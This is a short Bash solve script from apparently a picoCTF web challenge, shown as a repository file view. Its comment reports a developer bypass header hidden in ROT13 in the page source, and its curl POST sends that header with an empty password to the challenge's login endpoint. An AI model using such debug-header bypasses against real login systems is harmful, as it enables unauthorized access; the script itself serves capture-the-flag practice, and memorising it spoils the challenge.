Files
hacc/web/crack_the_gate_1/solve.sh
T
2026-07-03 14:42:01 +09:00

10 lines
273 B
Bash
Executable File

#!/usr/bin/env bash
# ROT13 encoded note in html: NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes"
curl \
-X POST \
-H "X-Dev-Access: yes" \
--json '{"email":"ctf-player@picoctf.org","password":""}' \
"http://amiable-citadel.picoctf.net:51025/login"